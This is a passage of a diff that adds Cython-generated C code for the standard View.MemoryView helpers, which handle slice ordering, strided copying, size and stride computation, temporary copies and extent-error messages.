__pyx_t_4; + + /* "View.MemoryView":1127 + * + * for i in range(ndim): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * f_stride = mslice.strides[i] + * break + */ + __pyx_t_2 = ((__pyx_v_mslice->shape[__pyx_v_i]) > 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1128 + * for i in range(ndim): + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_f_stride = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1129 + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] + * break # <<<<<<<<<<<<<< + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): + */ + goto __pyx_L7_break; + + /* "View.MemoryView":1127 + * + * for i in range(ndim): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * f_stride = mslice.strides[i] + * break + */ + } + } + __pyx_L7_break:; + + /* "View.MemoryView":1131 + * break + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): # <<<<<<<<<<<<<< + * return 'C' + * else: + */ + __pyx_t_2 = (abs_py_ssize_t(__pyx_v_c_stride) <= abs_py_ssize_t(__pyx_v_f_stride)); + if (__pyx_t_2) { + + /* "View.MemoryView":1132 + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): + * return 'C' # <<<<<<<<<<<<<< + * else: + * return 'F' + */ + __pyx_r = 'C'; + goto __pyx_L0; + + /* "View.MemoryView":1131 + * break + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): # <<<<<<<<<<<<<< + * return 'C' + * else: + */ + } + + /* "View.MemoryView":1134 + * return 'C' + * else: + * return 'F' # <<<<<<<<<<<<<< + * + * @cython.cdivision(True) + */ + /*else*/ { + __pyx_r = 'F'; + goto __pyx_L0; + } + + /* "View.MemoryView":1113 + * + * @cname('__pyx_get_best_slice_order') + * cdef char get_best_order(__Pyx_memviewslice *mslice, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * """ + * Figure out the best memory access order for a given slice. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1137 + * + * @cython.cdivision(True) + * cdef void _copy_strided_to_strided(char *src_data, Py_ssize_t *src_strides, # <<<<<<<<<<<<<< + * char *dst_data, Py_ssize_t *dst_strides, + * Py_ssize_t *src_shape, Py_ssize_t *dst_shape, + */ + +static void _copy_strided_to_strided(char *__pyx_v_src_data, Py_ssize_t *__pyx_v_src_strides, char *__pyx_v_dst_data, Py_ssize_t *__pyx_v_dst_strides, Py_ssize_t *__pyx_v_src_shape, Py_ssize_t *__pyx_v_dst_shape, int __pyx_v_ndim, size_t __pyx_v_itemsize) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + CYTHON_UNUSED Py_ssize_t __pyx_v_src_extent; + Py_ssize_t __pyx_v_dst_extent; + Py_ssize_t __pyx_v_src_stride; + Py_ssize_t __pyx_v_dst_stride; + int __pyx_t_1; + int __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + Py_ssize_t __pyx_t_5; + + /* "View.MemoryView":1144 + * + * cdef Py_ssize_t i + * cdef Py_ssize_t src_extent = src_shape[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] + */ + __pyx_v_src_extent = (__pyx_v_src_shape[0]); + + /* "View.MemoryView":1145 + * cdef Py_ssize_t i + * cdef Py_ssize_t src_extent = src_shape[0] + * cdef Py_ssize_t dst_extent = dst_shape[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t src_stride = src_strides[0] + * cdef Py_ssize_t dst_stride = dst_strides[0] + */ + __pyx_v_dst_extent = (__pyx_v_dst_shape[0]); + + /* "View.MemoryView":1146 + * cdef Py_ssize_t src_extent = src_shape[0] + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + */ + __pyx_v_src_stride = (__pyx_v_src_strides[0]); + + /* "View.MemoryView":1147 + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] + * cdef Py_ssize_t dst_stride = dst_strides[0] # <<<<<<<<<<<<<< + * + * if ndim == 1: + */ + __pyx_v_dst_stride = (__pyx_v_dst_strides[0]); + + /* "View.MemoryView":1149 + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + */ + __pyx_t_1 = (__pyx_v_ndim == 1); + if (__pyx_t_1) { + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + __pyx_t_2 = (__pyx_v_src_stride > 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_dst_stride > 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L5_bool_binop_done; + } + + /* "View.MemoryView":1151 + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): # <<<<<<<<<<<<<< + * memcpy(dst_data, src_data, itemsize * dst_extent) + * else: + */ + __pyx_t_2 = (((size_t)__pyx_v_src_stride) == __pyx_v_itemsize); + if (__pyx_t_2) { + __pyx_t_2 = (__pyx_v_itemsize == ((size_t)__pyx_v_dst_stride)); + } + __pyx_t_1 = __pyx_t_2; + __pyx_L5_bool_binop_done:; + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + if (__pyx_t_1) { + + /* "View.MemoryView":1152 + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) # <<<<<<<<<<<<<< + * else: + * for i in range(dst_extent): + */ + (void)(memcpy(__pyx_v_dst_data, __pyx_v_src_data, (__pyx_v_itemsize * __pyx_v_dst_extent))); + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + goto __pyx_L4; + } + + /* "View.MemoryView":1154 + * memcpy(dst_data, src_data, itemsize * dst_extent) + * else: + * for i in range(dst_extent): # <<<<<<<<<<<<<< + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride + */ + /*else*/ { + __pyx_t_3 = __pyx_v_dst_extent; + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_4; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "View.MemoryView":1155 + * else: + * for i in range(dst_extent): + * memcpy(dst_data, src_data, itemsize) # <<<<<<<<<<<<<< + * src_data += src_stride + * dst_data += dst_stride + */ + (void)(memcpy(__pyx_v_dst_data, __pyx_v_src_data, __pyx_v_itemsize)); + + /* "View.MemoryView":1156 + * for i in range(dst_extent): + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride # <<<<<<<<<<<<<< + * dst_data += dst_stride + * else: + */ + __pyx_v_src_data = (__pyx_v_src_data + __pyx_v_src_stride); + + /* "View.MemoryView":1157 + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride + * dst_data += dst_stride # <<<<<<<<<<<<<< + * else: + * for i in range(dst_extent): + */ + __pyx_v_dst_data = (__pyx_v_dst_data + __pyx_v_dst_stride); + } + } + __pyx_L4:; + + /* "View.MemoryView":1149 + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1159 + * dst_data += dst_stride + * else: + * for i in range(dst_extent): # <<<<<<<<<<<<<< + * _copy_strided_to_strided(src_data, src_strides + 1, + * dst_data, dst_strides + 1, + */ + /*else*/ { + __pyx_t_3 = __pyx_v_dst_extent; + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_4; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "View.MemoryView":1160 + * else: + * for i in range(dst_extent): + * _copy_strided_to_strided(src_data, src_strides + 1, # <<<<<<<<<<<<<< + * dst_data, dst_strides + 1, + * src_shape + 1, dst_shape + 1, + */ + _copy_strided_to_strided(__pyx_v_src_data, (__pyx_v_src_strides + 1), __pyx_v_dst_data, (__pyx_v_dst_strides + 1), (__pyx_v_src_shape + 1), (__pyx_v_dst_shape + 1), (__pyx_v_ndim - 1), __pyx_v_itemsize); + + /* "View.MemoryView":1164 + * src_shape + 1, dst_shape + 1, + * ndim - 1, itemsize) + * src_data += src_stride # <<<<<<<<<<<<<< + * dst_data += dst_stride + * + */ + __pyx_v_src_data = (__pyx_v_src_data + __pyx_v_src_stride); + + /* "View.MemoryView":1165 + * ndim - 1, itemsize) + * src_data += src_stride + * dst_data += dst_stride # <<<<<<<<<<<<<< + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, + */ + __pyx_v_dst_data = (__pyx_v_dst_data + __pyx_v_dst_stride); + } + } + __pyx_L3:; + + /* "View.MemoryView":1137 + * + * @cython.cdivision(True) + * cdef void _copy_strided_to_strided(char *src_data, Py_ssize_t *src_strides, # <<<<<<<<<<<<<< + * char *dst_data, Py_ssize_t *dst_strides, + * Py_ssize_t *src_shape, Py_ssize_t *dst_shape, + */ + + /* function exit code */ +} + +/* "View.MemoryView":1167 + * dst_data += dst_stride + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + */ + +static void copy_strided_to_strided(__Pyx_memviewslice *__pyx_v_src, __Pyx_memviewslice *__pyx_v_dst, int __pyx_v_ndim, size_t __pyx_v_itemsize) { + + /* "View.MemoryView":1170 + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + * _copy_strided_to_strided(src.data, src.strides, dst.data, dst.strides, # <<<<<<<<<<<<<< + * src.shape, dst.shape, ndim, itemsize) + * + */ + _copy_strided_to_strided(__pyx_v_src->data, __pyx_v_src->strides, __pyx_v_dst->data, __pyx_v_dst->strides, __pyx_v_src->shape, __pyx_v_dst->shape, __pyx_v_ndim, __pyx_v_itemsize); + + /* "View.MemoryView":1167 + * dst_data += dst_stride + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1174 + * + * @cname('__pyx_memoryview_slice_get_size') + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + */ + +static Py_ssize_t __pyx_memoryview_slice_get_size(__Pyx_memviewslice *__pyx_v_src, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_shape; + Py_ssize_t __pyx_v_size; + Py_ssize_t __pyx_r; + Py_ssize_t __pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + + /* "View.MemoryView":1176 + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize # <<<<<<<<<<<<<< + * + * for shape in src.shape[:ndim]: + */ + __pyx_t_1 = __pyx_v_src->memview->view.itemsize; + __pyx_v_size = __pyx_t_1; + + /* "View.MemoryView":1178 + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + * + * for shape in src.shape[:ndim]: # <<<<<<<<<<<<<< + * size *= shape + * + */ + __pyx_t_3 = (__pyx_v_src->shape + __pyx_v_ndim); + for (__pyx_t_4 = __pyx_v_src->shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_v_shape = (__pyx_t_2[0]); + + /* "View.MemoryView":1179 + * + * for shape in src.shape[:ndim]: + * size *= shape # <<<<<<<<<<<<<< + * + * return size + */ + __pyx_v_size = (__pyx_v_size * __pyx_v_shape); + } + + /* "View.MemoryView":1181 + * size *= shape + * + * return size # <<<<<<<<<<<<<< + * + * @cname('__pyx_fill_contig_strides_array') + */ + __pyx_r = __pyx_v_size; + goto __pyx_L0; + + /* "View.MemoryView":1174 + * + * @cname('__pyx_memoryview_slice_get_size') + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1184 + * + * @cname('__pyx_fill_contig_strides_array') + * cdef Py_ssize_t fill_contig_strides_array( # <<<<<<<<<<<<<< + * Py_ssize_t *shape, Py_ssize_t *strides, Py_ssize_t stride, + * int ndim, char order) noexcept nogil: + */ + +static Py_ssize_t __pyx_fill_contig_strides_array(Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, Py_ssize_t __pyx_v_stride, int __pyx_v_ndim, char __pyx_v_order) { + int __pyx_v_idx; + Py_ssize_t __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + + /* "View.MemoryView":1193 + * cdef int idx + * + * if order == 'F': # <<<<<<<<<<<<<< + * for idx in range(ndim): + * strides[idx] = stride + */ + __pyx_t_1 = (__pyx_v_order == 'F'); + if (__pyx_t_1) { + + /* "View.MemoryView":1194 + * + * if order == 'F': + * for idx in range(ndim): # <<<<<<<<<<<<<< + * strides[idx] = stride + * stride *= shape[idx] + */ + __pyx_t_2 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_idx = __pyx_t_4; + + /* "View.MemoryView":1195 + * if order == 'F': + * for idx in range(ndim): + * strides[idx] = stride # <<<<<<<<<<<<<< + * stride *= shape[idx] + * else: + */ + (__pyx_v_strides[__pyx_v_idx]) = __pyx_v_stride; + + /* "View.MemoryView":1196 + * for idx in range(ndim): + * strides[idx] = stride + * stride *= shape[idx] # <<<<<<<<<<<<<< + * else: + * for idx in range(ndim - 1, -1, -1): + */ + __pyx_v_stride = (__pyx_v_stride * (__pyx_v_shape[__pyx_v_idx])); + } + + /* "View.MemoryView":1193 + * cdef int idx + * + * if order == 'F': # <<<<<<<<<<<<<< + * for idx in range(ndim): + * strides[idx] = stride + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1198 + * stride *= shape[idx] + * else: + * for idx in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * strides[idx] = stride + * stride *= shape[idx] + */ + /*else*/ { + for (__pyx_t_2 = (__pyx_v_ndim - 1); __pyx_t_2 > -1; __pyx_t_2-=1) { + __pyx_v_idx = __pyx_t_2; + + /* "View.MemoryView":1199 + * else: + * for idx in range(ndim - 1, -1, -1): + * strides[idx] = stride # <<<<<<<<<<<<<< + * stride *= shape[idx] + * + */ + (__pyx_v_strides[__pyx_v_idx]) = __pyx_v_stride; + + /* "View.MemoryView":1200 + * for idx in range(ndim - 1, -1, -1): + * strides[idx] = stride + * stride *= shape[idx] # <<<<<<<<<<<<<< + * + * return stride + */ + __pyx_v_stride = (__pyx_v_stride * (__pyx_v_shape[__pyx_v_idx])); + } + } + __pyx_L3:; + + /* "View.MemoryView":1202 + * stride *= shape[idx] + * + * return stride # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_data_to_temp') + */ + __pyx_r = __pyx_v_stride; + goto __pyx_L0; + + /* "View.MemoryView":1184 + * + * @cname('__pyx_fill_contig_strides_array') + * cdef Py_ssize_t fill_contig_strides_array( # <<<<<<<<<<<<<< + * Py_ssize_t *shape, Py_ssize_t *strides, Py_ssize_t stride, + * int ndim, char order) noexcept nogil: + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1205 + * + * @cname('__pyx_memoryview_copy_data_to_temp') + * cdef void *copy_data_to_temp(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *tmpslice, + * char order, + */ + +static void *__pyx_memoryview_copy_data_to_temp(__Pyx_memviewslice *__pyx_v_src, __Pyx_memviewslice *__pyx_v_tmpslice, char __pyx_v_order, int __pyx_v_ndim) { + int __pyx_v_i; + void *__pyx_v_result; + size_t __pyx_v_itemsize; + size_t __pyx_v_size; + void *__pyx_r; + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + struct __pyx_memoryview_obj *__pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":1216 + * cdef void *result + * + * cdef size_t itemsize = src.memview.view.itemsize # <<<<<<<<<<<<<< + * cdef size_t size = slice_get_size(src, ndim) + * + */ + __pyx_t_1 = __pyx_v_src->memview->view.itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":1217 + * + * cdef size_t itemsize = src.memview.view.itemsize + * cdef size_t size = slice_get_size(src, ndim) # <<<<<<<<<<<<<< + * + * result = malloc(size) + */ + __pyx_v_size = __pyx_memoryview_slice_get_size(__pyx_v_src, __pyx_v_ndim); + + /* "View.MemoryView":1219 + * cdef size_t size = slice_get_size(src, ndim) + * + * result = malloc(size) # <<<<<<<<<<<<<< + * if not result: + * _err_no_memory() + */ + __pyx_v_result = malloc(__pyx_v_size); + + /* "View.MemoryView":1220 + * + * result = malloc(size) + * if not result: # <<<<<<<<<<<<<< + * _err_no_memory() + * + */ + __pyx_t_2 = (!(__pyx_v_result != 0)); + if (__pyx_t_2) { + + /* "View.MemoryView":1221 + * result = malloc(size) + * if not result: + * _err_no_memory() # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_3 = __pyx_memoryview_err_no_memory(); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 1221, __pyx_L1_error) + + /* "View.MemoryView":1220 + * + * result = malloc(size) + * if not result: # <<<<<<<<<<<<<< + * _err_no_memory() + * + */ + } + + /* "View.MemoryView":1224 + * + * + * tmpslice.data = result # <<<<<<<<<<<<<< + * tmpslice.memview = src.memview + * for i in range(ndim): + */ + __pyx_v_tmpslice->data = ((char *)__pyx_v_result); + + /* "View.MemoryView":1225 + * + * tmpslice.data = result + * tmpslice.memview = src.memview # <<<<<<<<<<<<<< + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] + */ + __pyx_t_4 = __pyx_v_src->memview; + __pyx_v_tmpslice->memview = __pyx_t_4; + + /* "View.MemoryView":1226 + * tmpslice.data = result + * tmpslice.memview = src.memview + * for i in range(ndim): # <<<<<<<<<<<<<< + * tmpslice.shape[i] = src.shape[i] + * tmpslice.suboffsets[i] = -1 + */ + __pyx_t_3 = __pyx_v_ndim; + __pyx_t_5 = __pyx_t_3; + for (__pyx_t_6 = 0; __pyx_t_6 < __pyx_t_5; __pyx_t_6+=1) { + __pyx_v_i = __pyx_t_6; + + /* "View.MemoryView":1227 + * tmpslice.memview = src.memview + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] # <<<<<<<<<<<<<< + * tmpslice.suboffsets[i] = -1 + * + */ + (__pyx_v_tmpslice->shape[__pyx_v_i]) = (__pyx_v_src->shape[__pyx_v_i]); + + /* "View.MemoryView":1228 + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] + * tmpslice.suboffsets[i] = -1 # <<<<<<<<<<<<<< + * + * fill_contig_strides_array(&tmpslice.shape[0], &tmpslice.strides[0], itemsize, ndim, order) + */ + (__pyx_v_tmpslice->suboffsets[__pyx_v_i]) = -1L; + } + + /* "View.MemoryView":1230 + * tmpslice.suboffsets[i] = -1 + * + * fill_contig_strides_array(&tmpslice.shape[0], &tmpslice.strides[0], itemsize, ndim, order) # <<<<<<<<<<<<<< + * + * + */ + (void)(__pyx_fill_contig_strides_array((&(__pyx_v_tmpslice->shape[0])), (&(__pyx_v_tmpslice->strides[0])), __pyx_v_itemsize, __pyx_v_ndim, __pyx_v_order)); + + /* "View.MemoryView":1233 + * + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if tmpslice.shape[i] == 1: + * tmpslice.strides[i] = 0 + */ + __pyx_t_3 = __pyx_v_ndim; + __pyx_t_5 = __pyx_t_3; + for (__pyx_t_6 = 0; __pyx_t_6 < __pyx_t_5; __pyx_t_6+=1) { + __pyx_v_i = __pyx_t_6; + + /* "View.MemoryView":1234 + * + * for i in range(ndim): + * if tmpslice.shape[i] == 1: # <<<<<<<<<<<<<< + * tmpslice.strides[i] = 0 + * + */ + __pyx_t_2 = ((__pyx_v_tmpslice->shape[__pyx_v_i]) == 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1235 + * for i in range(ndim): + * if tmpslice.shape[i] == 1: + * tmpslice.strides[i] = 0 # <<<<<<<<<<<<<< + * + * if slice_is_contig(src[0], order, ndim): + */ + (__pyx_v_tmpslice->strides[__pyx_v_i]) = 0; + + /* "View.MemoryView":1234 + * + * for i in range(ndim): + * if tmpslice.shape[i] == 1: # <<<<<<<<<<<<<< + * tmpslice.strides[i] = 0 + * + */ + } + } + + /* "View.MemoryView":1237 + * tmpslice.strides[i] = 0 + * + * if slice_is_contig(src[0], order, ndim): # <<<<<<<<<<<<<< + * memcpy(result, src.data, size) + * else: + */ + __pyx_t_2 = __pyx_memviewslice_is_contig((__pyx_v_src[0]), __pyx_v_order, __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1238 + * + * if slice_is_contig(src[0], order, ndim): + * memcpy(result, src.data, size) # <<<<<<<<<<<<<< + * else: + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) + */ + (void)(memcpy(__pyx_v_result, __pyx_v_src->data, __pyx_v_size)); + + /* "View.MemoryView":1237 + * tmpslice.strides[i] = 0 + * + * if slice_is_contig(src[0], order, ndim): # <<<<<<<<<<<<<< + * memcpy(result, src.data, size) + * else: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":1240 + * memcpy(result, src.data, size) + * else: + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) # <<<<<<<<<<<<<< + * + * return result + */ + /*else*/ { + copy_strided_to_strided(__pyx_v_src, __pyx_v_tmpslice, __pyx_v_ndim, __pyx_v_itemsize); + } + __pyx_L9:; + + /* "View.MemoryView":1242 + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) + * + * return result # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_result; + goto __pyx_L0; + + /* "View.MemoryView":1205 + * + * @cname('__pyx_memoryview_copy_data_to_temp') + * cdef void *copy_data_to_temp(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *tmpslice, + * char order, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.copy_data_to_temp", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1247 + * + * @cname('__pyx_memoryview_err_extents') + * cdef int _err_extents(int i, Py_ssize_t extent1, # <<<<<<<<<<<<<< + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" + */ + +static int __pyx_memoryview_err_extents(int __pyx_v_i, Py_ssize_t __pyx_v_extent1, Py_ssize_t __pyx_v_extent2) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + Py_UCS4 __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_extents", 0); + + /* "View.MemoryView":1249 + * cdef int _err_extents(int i, Py_ssize_t extent1, + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err_dim') + */ + __pyx_t_1 = PyTuple_New(7); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = 0; + __pyx_t_3 = 127; + __Pyx_INCREF(__pyx_kp_u_got_differing_extents_in_dimensi); + __pyx_t_2 += 35; + __Pyx_GIVEREF(__pyx_kp_u_got_differing_extents_in_dimensi); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_kp_u_got_differing_extents_in_dimensi); + __pyx_t_4 = __Pyx_PyUnicode_From_int(__pyx_v_i, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u_got); + __pyx_t_2 += 6; + __Pyx_GIVEREF(__pyx_kp_u_got); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_kp_u_got); + __pyx_t_4 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_extent1, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u_and); + __pyx_t_2 += 5; + __Pyx_GIVEREF(__pyx_kp_u_and); + PyTuple_SET_ITEM(__pyx_t_1, 4, __pyx_kp_u_and); + __pyx_t_4 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_extent2, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 5, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u__9); + __pyx_t_2 += 1; + __Pyx_GIVEREF(__pyx_kp_u__9); + PyTuple_SET_ITEM(__pyx_t_1, 6, __pyx_kp_u__9); + __pyx_t_4 = __Pyx_PyUnicode_Join(__pyx_t_1, 7, __pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_4, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(1, 1249, __pyx_L1_error) + + /* "View.MemoryView":1247 + * + * @cname('__pyx_memoryview_err_extents') + * cdef int _err_extents(int i, Py_ssize_t extent1, # <<<<<<<<<<<<<< + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView._err_extents", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1252 + * + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg % dim + * + */ + +static int __pyx_memoryview_err_dim(PyObject *__pyx_v_error, PyObject *__pyx_v_msg, int __pyx_v_dim) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); 